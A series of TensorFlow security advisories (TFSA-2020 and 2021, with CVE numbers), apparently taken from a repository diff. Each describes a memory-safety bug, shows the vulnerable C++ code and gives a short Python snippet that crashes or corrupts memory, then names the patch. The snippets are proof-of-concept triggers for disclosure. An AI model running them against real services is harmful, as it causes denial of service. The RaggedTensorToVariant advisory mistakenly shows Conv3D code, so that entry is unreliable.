### Impact
If a user passes an invalid argument to `dlpack.to_dlpack` the expected
validations will cause variables to bind to `nullptr` while setting a `status`
variable to the error condition.
However, this `status` argument is not [properly
checked](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L265-L267):
```cc
dlm_tensor->dl_tensor.data = TFE_TensorHandleDevicePointer(h, status);
dlm_tensor->dl_tensor.dtype = GetDlDataType(data_type, status);
```
Hence, code following these methods will [bind references to null
pointers](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L279-L285):
```cc
dlm_tensor->dl_tensor.shape = &(*shape_arr)[0];
dlm_tensor->dl_tensor.strides = &(*stride_arr)[0];
```
This is undefined behavior and reported as an error if compiling with
`-fsanitize=null`.
### Vulnerable Versions
TensorFlow 2.2.0, 2.3.0.
### Patches
We have patched the issue in
[22e07fb204386768e5bcbea563641ea11f96ceb8](https://github.com/tensorflow/tensorflow/commit/22e07fb204386768e5bcbea563641ea11f96ceb8)
and will release a patch release for all affected versions.
We recommend users to upgrade to TensorFlow 2.2.1 or 2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-023.md).
@@ -0,0 +1,49 @@
## TFSA-2020-026: Segfault in `tf.raw_ops.Switch` in eager mode
### CVE Number
CVE-2020-15190
### Impact
The
[`tf.raw_ops.Switch`](https://www.tensorflow.org/api_docs/python/tf/raw_ops/Switch)
operation takes as input a tensor and a boolean and outputs two tensors.
Depending on the boolean value, one of the tensors is exactly the input tensor
whereas the other one should be an empty tensor.
However, the eager runtime [traverses all tensors in the
output](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/common_runtime/eager/kernel_and_device.cc#L308-L313):
```cc
if (outputs != nullptr) {
outputs->clear();
for (int i = 0; i < context.num_outputs(); ++i) {
outputs->push_back(Tensor(*context.mutable_output(i)));
}
}
```
Since only one of the tensors is defined, the other one is `nullptr`, hence we
are binding a reference to `nullptr`. This is undefined behavior and reported as
an error if compiling with `-fsanitize=null`. In this case, this results in a
segmentation fault.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[da8558533d925694483d2c136a9220d6d49d843c](https://github.com/tensorflow/tensorflow/commit/da8558533d925694483d2c136a9220d6d49d843c)
and will release a patch release for all affected versions.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,52 @@
## TFSA-2020-027: Segfault in `tf.quantization.quantize_and_dequantize`
### CVE Number
CVE-2020-15265
### Impact
An attacker can pass an invalid `axis` value to
`tf.quantization.quantize_and_dequantize`:
```python
tf.quantization.quantize_and_dequantize(
input=[2.5, 2.5], input_min=[0,0], input_max=[1,1], axis=10)
```
This results in accessing [a dimension outside the rank of the input
tensor](https://github.com/tensorflow/tensorflow/blob/0225022b725993bfc19b87a02a2faaad9a53bc17/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L74)
in the C++ kernel implementation:
```cc
const int depth = (axis_ == -1) ? 1 : input.dim_size(axis_);
```
However, [`dim_size` only does a
`DCHECK`](https://github.com/tensorflow/tensorflow/blob/0225022b725993bfc19b87a02a2faaad9a53bc17/tensorflow/core/framework/tensor_shape.cc#L292-L307)
to validate the argument and then uses it to access the corresponding element of
an array:
```cc
int64 TensorShapeBase<Shape>::dim_size(int d) const {
DCHECK_GE(d, 0);
DCHECK_LT(d, dims());
DoStuffWith(dims_[d]);
}
```
Since in normal builds, `DCHECK`-like macros are no-ops, this results in
segfault and access out of bounds of the array.
### Patches
We have patched the issue in
[eccb7ec454e6617738554a255d77f08e60ee0808](https://github.com/tensorflow/tensorflow/commit/eccb7ec454e6617738554a255d77f08e60ee0808)
and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly
packages after this commit will also have the issue resolved.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported in
[#42105](https://github.com/tensorflow/issues/42105).
@@ -0,0 +1,27 @@
## TFSA-2020-028: Float cast overflow undefined behavior
### CVE Number
CVE-2020-15266
### Impact
When the `boxes` argument of `tf.image.crop_and_resize` has a very large value,
the CPU kernel implementation receives it as a C++ `nan` floating point value.
Attempting to operate on this is undefined behavior which later produces a
segmentation fault.
### Patches
We have patched the issue in
[c0319231333f0f16e1cc75ec83660b01fedd4182](https://github.com/tensorflow/tensorflow/commit/c0319231333f0f16e1cc75ec83660b01fedd4182)
and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly
packages after this commit will also have the issue resolved.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported in
[#42129](https://github.com/tensorflow/issues/42129).
@@ -0,0 +1,53 @@
## TFSA-2020-029: Uninitialized memory access in Eigen types
### CVE Number
CVE-2020-26266
### Impact
Under certain cases, a saved model can trigger use of uninitialized values
during code execution. This is caused by having tensor buffers be filled with
the default value of the type but forgetting to [default initialize the
quantized floating point types in
Eigen](https://github.com/tensorflow/tensorflow/blob/f70160322a579144950dff1537dcbe3c7c09d6f5/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/FixedPointTypes.h#L61-L104):
```cc
struct QUInt8 {
QUInt8() {}
// ...
uint8_t value;
};
struct QInt16 {
QInt16() {}
// ...
int16_t value;
};
struct QUInt16 {
QUInt16() {}
// ...
uint16_t value;
};
struct QInt32 {
QInt32() {}
// ...
int32_t value;
};
```
### Patches
We have patched the issue in GitHub commit
[ace0c15a22f7f054abcc1f53eabbcb0a1239a9e2](https://github.com/tensorflow/tensorflow/commit/ace0c15a22f7f054abcc1f53eabbcb0a1239a9e2)
and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly
packages after this commit will also have the issue resolved.
Since this issue also impacts TF versions before 2.4, we will patch all releases
between 1.15 and 2.3 inclusive.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
@@ -0,0 +1,89 @@
## TFSA-2020-030: Lack of validation in data format attributes
### CVE Number
CVE-2020-26267
### Impact
The `tf.raw_ops.DataFormatVecPermute` API does not validate the `src_format` and
`dst_format` attributes. [The
code](https://github.com/tensorflow/tensorflow/blob/304b96815324e6a73d046df10df6626d63ac12ad/tensorflow/core/kernels/data_format_ops.cc)
assumes that these two arguments define a permutation of `NHWC`.
However, these assumptions are not checked and this can result in uninitialized
memory accesses, read outside of bounds and even crashes.
```python
>>> import tensorflow as tf
>>> tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='1234', dst_format='1234')
<tf.Tensor: shape=(2,), dtype=int32, numpy=array([4, 757100143], dtype=int32)>
...
>>> tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='HHHH', dst_format='WWWW')
<tf.Tensor: shape=(2,), dtype=int32, numpy=array([4, 32701], dtype=int32)>
...
>>> tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='H', dst_format='W')
<tf.Tensor: shape=(2,), dtype=int32, numpy=array([4, 32701], dtype=int32)>
>>> tf.raw_ops.DataFormatVecPermute(x=[1,2,3,4],
src_format='1234', dst_format='1253')
<tf.Tensor: shape=(4,), dtype=int32, numpy=array([4, 2, 939037184, 3], dtype=int32)>
...
>>> tf.raw_ops.DataFormatVecPermute(x=[1,2,3,4],
src_format='1234', dst_format='1223')
<tf.Tensor: shape=(4,), dtype=int32, numpy=array([4, 32701, 2, 3], dtype=int32)>
...
>>> tf.raw_ops.DataFormatVecPermute(x=[1,2,3,4],
src_format='1224', dst_format='1423')
<tf.Tensor: shape=(4,), dtype=int32, numpy=array([1, 4, 3, 32701], dtype=int32)>
...
>>> tf.raw_ops.DataFormatVecPermute(x=[1,2,3,4], src_format='1234', dst_format='432')
<tf.Tensor: shape=(4,), dtype=int32, numpy=array([4, 3, 2, 32701], dtype=int32)>
...
>>> tf.raw_ops.DataFormatVecPermute(x=[1,2,3,4],
src_format='12345678', dst_format='87654321')
munmap_chunk(): invalid pointer
Aborted
...
>>> tf.raw_ops.DataFormatVecPermute(x=[[1,5],[2,6],[3,7],[4,8]],
src_format='12345678', dst_format='87654321')
<tf.Tensor: shape=(4, 2), dtype=int32, numpy=
array([[71364624, 0],
[71365824, 0],
[ 560, 0],
[ 48, 0]], dtype=int32)>
...
>>> tf.raw_ops.DataFormatVecPermute(x=[[1,5],[2,6],[3,7],[4,8]],
src_format='12345678', dst_format='87654321')
free(): invalid next size (fast)
Aborted
```
A similar issue occurs in `tf.raw_ops.DataFormatDimMap`, for the same reasons:
```python
>>> tf.raw_ops.DataFormatDimMap(x=[[1,5],[2,6],[3,7],[4,8]], src_format='1234',
>>> dst_format='8765')
<tf.Tensor: shape=(4, 2), dtype=int32, numpy=
array([[1954047348, 1954047348],
[1852793646, 1852793646],
[1954047348, 1954047348],
[1852793632, 1852793632]], dtype=int32)>
```
### Patches
We have patched the issue in GitHub commit
[ebc70b7a592420d3d2f359e4b1694c236b82c7ae](https://github.com/tensorflow/tensorflow/commit/ebc70b7a592420d3d2f359e4b1694c236b82c7ae)
and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly
packages after this commit will also have the issue resolved.
Since this issue also impacts TF versions before 2.4, we will patch all releases
between 1.15 and 2.3 inclusive.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,47 @@
## TFSA-2020-031: Write to immutable memory region
### CVE Number
CVE-2020-26268
### Impact
The `tf.raw_ops.ImmutableConst` operation returns a constant tensor created from
a memory mapped file which is assumed immutable. However, if the type of the
tensor is not an integral type, the operation crashes the Python interpreter as
it tries to write to the memory area:
```python
>>> import tensorflow as tf
>>> with open('/tmp/test.txt','w') as f: f.write('a'*128)
>>> tf.raw_ops.ImmutableConst(dtype=tf.string,shape=2,
memory_region_name='/tmp/test.txt')
```
If the file is too small, TensorFlow properly returns an error as the memory
area has fewer bytes than what is needed for the tensor it creates. However, as
soon as there are enough bytes, the above snippet causes a segmentation fault.
This is because the alocator used to return the buffer data is not marked as
returning an opaque handle since the [needed virtual
method](https://github.com/tensorflow/tensorflow/blob/c1e1fc899ad5f8c725dcbb6470069890b5060bc7/tensorflow/core/framework/typed_allocator.h#L78-L85)
is [not
overriden](https://github.com/tensorflow/tensorflow/blob/acdf3c04fcfa767ae8d109b9e1f727ef050dba4d/tensorflow/core/kernels/immutable_constant_op.cc).
### Patches
We have patched the issue in GitHub commit
[c1e1fc899ad5f8c725dcbb6470069890b5060bc7](https://github.com/tensorflow/tensorflow/commit/c1e1fc899ad5f8c725dcbb6470069890b5060bc7)
and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly
packages after this commit will also have the issue resolved.
Since this issue also impacts TF versions before 2.4, we will patch all releases
between 1.15 and 2.3 inclusive.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,51 @@
## TFSA-2020-032: Heap out of bounds read in filesystem glob matching
### CVE Number
CVE-2020-26269
### Impact
The general implementation for matching filesystem paths to globbing pattern is
vulnerable to an access out of bounds of [the array holding the
directories](https://github.com/tensorflow/tensorflow/blob/458c6260265c46ebaf18052d6c61aea4b6b40926/tensorflow/core/platform/file_system_helper.cc#L127):
```cc
if (!fs->Match(child_path, dirs[dir_index])) { ... }
```
Since `dir_index` is [unconditionaly
incremented](https://github.com/tensorflow/tensorflow/blob/458c6260265c46ebaf18052d6c61aea4b6b40926/tensorflow/core/platform/file_system_helper.cc#L106)
outside of the lambda function where the vulnerable pattern occurs, this results
in an access out of bounds issue under certain scenarios. For example, if
`/tmp/x` is a directory that only contains a single file `y`, then the following
snippet will cause a crash due to the out of bounds read:
```python
>>> tf.io.gfile.glob('/tmp/x/')
Segmentation fault
```
There are multiple invariants and preconditions that are assumed by the parallel
implementation of `GetMatchingPaths` but are not verified by the PRs introducing
it ([#40861](https://github.com/tensorflow/tensorflow/pull/40861) and
[#44310](https://github.com/tensorflow/tensorflow/pull/44310)). Thus, we are
completely rewriting the implementation to fully specify and validate these.
### Patches
We have patched the issue in GitHub commit
[8b5b9dc96666a3a5d27fad7179ff215e3b74b67c](https://github.com/tensorflow/tensorflow/commit/8b5b9dc96666a3a5d27fad7179ff215e3b74b67c)
and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly
packages after this commit will also have the issue resolved.
This issue only impacts master branch and the release candidates for TF version
2.4. The final release of the 2.4 release will be patched.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,27 @@
## TFSA-2020-033: CHECK-fail in LSTM with zero-length input
### CVE Number
CVE-2020-26270
### Impact
Running an LSTM/GRU model where the LSTM/GRU layer receives an input with
zero-length results in a `CHECK` failure when using the CUDA backend.
This can result in a query-of-death vulnerability, via denial of service, if
users can control the input to the layer.
### Patches
We have patched the issue in GitHub commit
[14755416e364f17fb1870882fa778c7fec7f16e3](https://github.com/tensorflow/tensorflow/commit/14755416e364f17fb1870882fa778c7fec7f16e3)
and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly
packages after this commit will also have the issue resolved.
Since this issue also impacts TF versions before 2.4, we will patch all releases
between 1.15 and 2.3 inclusive.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
@@ -0,0 +1,44 @@
## TFSA-2020-034: Heap out of bounds access in MakeEdge
### CVE Number
CVE-2020-26271
### Impact
Under certain cases, loading a saved model can result in accessing uninitialized
memory while building the computation graph. The [`MakeEdge`
function](https://github.com/tensorflow/tensorflow/blob/3616708cb866365301d8e67b43b32b46d94b08a0/tensorflow/core/common_runtime/graph_constructor.cc#L1426-L1438)
creates an edge between one output tensor of the `src` node (given by
`output_index`) and the input slot of the `dst` node (given by `input_index`).
This is only possible if the types of the tensors on both sides coincide, so the
function begins by obtaining the corresponding `DataType` values and comparing
these for equality:
```cc
DataType src_out = src->output_type(output_index);
DataType dst_in = dst->input_type(input_index);
//...
```
However, there is no check that the indices point to inside of the arrays they
index into. Thus, this can result in accessing data out of bounds of the
corresponding heap allocated arrays.
In most scenarios, this can manifest as unitialized data access, but if the
index points far away from the boundaries of the arrays this can be used to leak
addresses from the library.
### Patches
We have patched the issue in GitHub commit
[0cc38aaa4064fd9e79101994ce9872c6d91f816b](https://github.com/tensorflow/tensorflow/commit/0cc38aaa4064fd9e79101994ce9872c6d91f816b)
and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly
packages after this commit will also have the issue resolved.
Since this issue also impacts TF versions before 2.4, we will patch all releases
between 1.15 and 2.3 inclusive.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
@@ -0,0 +1,49 @@
## TFSA-2021-001: Heap buffer overflow in `RaggedBinCount`
### CVE Number
CVE-2021-29512
### Impact
If the `splits` argument of `RaggedBincount` does not specify a valid
[`SparseTensor`](https://www.tensorflow.org/api_docs/python/tf/sparse/SparseTensor),
then an attacker can trigger a heap buffer overflow:
```python
import tensorflow as tf
tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)
```
This will cause a read from outside the bounds of the `splits` tensor buffer in
the [implementation of the `RaggedBincount`
op](https://github.com/tensorflow/tensorflow/blob/8b677d79167799f71c42fd3fa074476e0295413a/tensorflow/core/kernels/bincount_op.cc#L430-L433):
```cc
for (int idx = 0; idx < num_values; ++idx) {
while (idx >= splits(batch_idx)) {
batch_idx++;
}
...
}
```
Before the `for` loop, `batch_idx` is set to 0. The user controls the `splits`
array, making it contain only one element, 0. Thus, the code in the `while` loop
would increment `batch_idx` and then try to read `splits(1)`, which is outside
of bounds.
### Patches
We have patched the issue in GitHub commit
[eebb96c2830d48597d055d247c0e9aebaea94cd5](https://github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are also affected.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,59 @@
## TFSA-2021-002: Heap out of bounds write in `RaggedBinCount`
### CVE Number
CVE-2021-29514
### Impact
If the `splits` argument of `RaggedBincount` does not specify a valid
[`SparseTensor`](https://www.tensorflow.org/api_docs/python/tf/sparse/SparseTensor),
then an attacker can trigger a heap buffer overflow:
```python
import tensorflow as tf
tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\
size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\
binary_output=False)
```
This will cause a read from outside the bounds of the `splits` tensor buffer in
the [implementation of the `RaggedBincount`
op](https://github.com/tensorflow/tensorflow/blob/8b677d79167799f71c42fd3fa074476e0295413a/tensorflow/core/kernels/bincount_op.cc#L430-L446):
```cc
for (int idx = 0; idx < num_values; ++idx) {
while (idx >= splits(batch_idx)) {
batch_idx++;
}
...
if (bin < size) {
if (binary_output_) {
out(batch_idx - 1, bin) = T(1);
} else {
T value = (weights_size > 0) ? weights(idx) : T(1);
out(batch_idx - 1, bin) += value;
}
}
}
```
Before the `for` loop, `batch_idx` is set to 0. The attacker sets `splits(0)` to
be 7, hence the `while` loop does not execute and `batch_idx` remains 0. This
then results in writing to `out(-1, bin)`, which is before the heap allocated
buffer for the output tensor.
### Patches
We have patched the issue in GitHub commit
[eebb96c2830d48597d055d247c0e9aebaea94cd5](https://github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are also affected.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,108 @@
## TFSA-2021-003: Type confusion during tensor casts lead to dereferencing null pointers
### CVE Number
CVE-2021-29513
### Impact
Calling TF operations with tensors of non-numeric types when the operations expect
numeric tensors result in null pointer dereferences.
There are multiple ways to reproduce this, listing a few examples here:
```python
import tensorflow as tf
import numpy as np
data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64)
```
```python
import tensorflow as tf
import numpy as np
data =
tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20)
```
```python
import tensorflow as tf
import numpy as np
data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20)
```
```python
import tensorflow as tf
import numpy as np
data = tf.range(start=np.int32(214),limit=660,delta=129,dtype=20)
```
```python
import tensorflow as tf
import numpy as np
data = tf.raw_ops.ResourceCountUpTo(resource=np.int32(30), limit=872, T=3)
```
```python
import tensorflow as tf
import numpy as np
writer_array = np.array([1,2],dtype=np.int32)
writer_tensor = tf.convert_to_tensor(writer_array,dtype=tf.resource)
```
All these examples and similar ones have the same behavior: the [conversion from
Python array to C++
array](https://github.com/tensorflow/tensorflow/blob/ff70c47a396ef1e3cb73c90513da4f5cb71bebba/tensorflow/python/lib/core/ndarray_tensor.cc#L113-L169)
is vulnerable to a type confusion:
```cc
int pyarray_type = PyArray_TYPE(array);
PyArray_Descr* descr = PyArray_DESCR(array);
switch (pyarray_type) {
...
case NPY_VOID:
// Quantized types are currently represented as custom struct types.
// PyArray_TYPE returns NPY_VOID for structs, and we should look into
// descr to derive the actual type.
// Direct feeds of certain types of ResourceHandles are represented as a
// custom struct type.
return PyArrayDescr_to_TF_DataType(descr, out_tf_datatype);
...
}
```
For the tensor types involved in the above example, the `pyarray_type` is
`NPY_VOID` but the `descr` field is such that `descr->field = NULL`. Then
[`PyArrayDescr_to_TF_DataType`](https://github.com/tensorflow/tensorflow/blob/ff70c47a396ef1e3cb73c90513da4f5cb71bebba/tensorflow/python/lib/core/ndarray_tensor.cc#L72-L77)
will trigger a null dereference:
```cc
Status PyArrayDescr_to_TF_DataType(PyArray_Descr* descr,
TF_DataType* out_tf_datatype) {
PyObject* key;
PyObject* value;
Py_ssize_t pos = 0;
if (PyDict_Next(descr->fields, &pos, &key, &value)) {
...
}
}
```
This is because the Python's `PyDict_Next` implementation would dereference the
first argument.
### Patches
We have patched the issue in GitHub commit
[030af767d357d1b4088c4a25c72cb3906abac489](https://github.com/tensorflow/tensorflow/commit/030af767d357d1b4088c4a25c72cb3906abac489).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360 as well as Ye Zhang and Yakun Zhang of Baidu X-Team.
@@ -0,0 +1,46 @@
## TFSA-2021-004: Reference binding to null pointer in `MatrixDiag*` ops
### CVE Number
CVE-2021-29515
### Impact
The implementation of [`MatrixDiag*`
operations](https://github.com/tensorflow/tensorflow/blob/4c4f420e68f1cfaf8f4b6e8e3eb857e9e4c3ff33/tensorflow/core/kernels/linalg/matrix_diag_op.cc#L195-L197)
does not validate that the tensor arguments are non-empty:
```cc
num_rows = context->input(2).flat<int32>()(0);
num_cols = context->input(3).flat<int32>()(0);
padding_value = context->input(4).flat<T>()(0);
```
Thus, users can trigger null pointer dereferences if any of the above tensors
are null:
```python
import tensorflow as tf
d = tf.convert_to_tensor([],dtype=tf.float32)
p = tf.convert_to_tensor([],dtype=tf.float32)
tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p)
```
Changing from `tf.raw_ops.MatrixDiagV2` to `tf.raw_ops.MatrixDiagV3` still reproduces the issue.
### Patches
We have patched the issue in GitHub commit
[a7116dd3913c4a4afd2a3a938573aa7c785fdfc6](https://github.com/tensorflow/tensorflow/commit/a7116dd3913c4a4afd2a3a938573aa7c785fdfc6).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ye Zhang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,54 @@
## TFSA-2021-005: Null pointer dereference via invalid Ragged Tensors
### CVE Number
CVE-2021-29516
### Impact
Calling `tf.raw_ops.RaggedTensorToVariant` with arguments specifying an invalid ragged tensor results in a null pointer dereference:
```python
import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])
```
```python
import tensorflow as tf
input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 2, 6, 2], dtype=tf.float32)
tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 39, 34, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
```
The implementation of [`RaggedTensorToVariant`
operations](https://github.com/tensorflow/tensorflow/blob/904b3926ed1c6c70380d5313d282d248a776baa1/tensorflow/core/kernels/ragged_tensor_to_variant_op.cc#L39-L40)
does not validate that the ragged tensor argument is non-empty:
```cc
int ragged_rank = batched_ragged.ragged_rank();
auto batched_splits_top_vec = batched_ragged.splits(0).vec<SPLIT_TYPE>();
```
Since `batched_ragged` contains no elements, `batched_ragged.splits` is a null vector, thus `batched_ragged.splits(0)` will result in dereferencing `nullptr`.
### Patches
We have patched the issue in GitHub commit
[b055b9c474cd376259dde8779908f9eeaf097d93](https://github.com/tensorflow/tensorflow/commit/b055b9c474cd376259dde8779908f9eeaf097d93).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,58 @@
## TFSA-2021-006: Division by zero in `Conv3D`
### CVE Number
CVE-2021-29517
### Impact
A malicious user could trigger a division by 0 in `Conv3D` implementation:
```python
import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])
```
The [implementation](https://github.com/tensorflow/tensorflow/blob/42033603003965bffac51ae171b51801565e002d/tensorflow/core/kernels/conv_ops_3d.cc#L143-L145) does a modulo operation based on user controlled input:
```cc
const int64 out_depth = filter.dim_size(4);
OP_REQUIRES(context, in_depth % filter_depth == 0, ...);
```
Thus, when `filter` has a 0 as the fifth element, this results in a division by 0.
Additionally, if the shape of the two tensors is not valid, an Eigen assertion
can be triggered, resulting in a program crash:
```python
import tensorflow as tf
input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32)
filter_tensor = tf.constant([], shape=[0, 0, 2, 6, 2], dtype=tf.float32)
tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 39, 34, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
```
The shape of the two tensors must follow the constraints specified in the [op
description](https://www.tensorflow.org/api_docs/python/tf/raw_ops/Conv3D).
### Patches
We have patched the issue in GitHub commit
[799f835a3dfa00a4d852defa29b15841eea9d64f](https://github.com/tensorflow/tensorflow/commit/799f835a3dfa00a4d852defa29b15841eea9d64f).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,46 @@
## TFSA-2021-007: Session operations in eager mode lead to null pointer dereferences
### CVE Number
CVE-2021-29518
### Impact
In eager mode (default in TF 2.0 and later), session operations are invalid.
However, users could still call the raw ops associated with them and trigger a
null pointer dereference:
```python
import tensorflow as tf
tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4)
```
```python
import tensorflow as tf
tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])
```
The
[implementation](https://github.com/tensorflow/tensorflow/blob/eebb96c2830d48597d055d247c0e9aebaea94cd5/tensorflow/core/kernels/session_ops.cc#L104) dereferences the session state pointer without checking if it is valid:
```cc
OP_REQUIRES_OK(ctx, ctx->session_state()->GetTensor(name, &val));
```
Thus, in eager mode, `ctx->session_state()` is nullptr and the call of the
member function is undefined behavior.
### Patches
We have patched the issue in GitHub commit
[ff70c47a396ef1e3cb73c90513da4f5cb71bebba](https://github.com/tensorflow/tensorflow/commit/ff70c47a396ef1e3cb73c90513da4f5cb71bebba).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
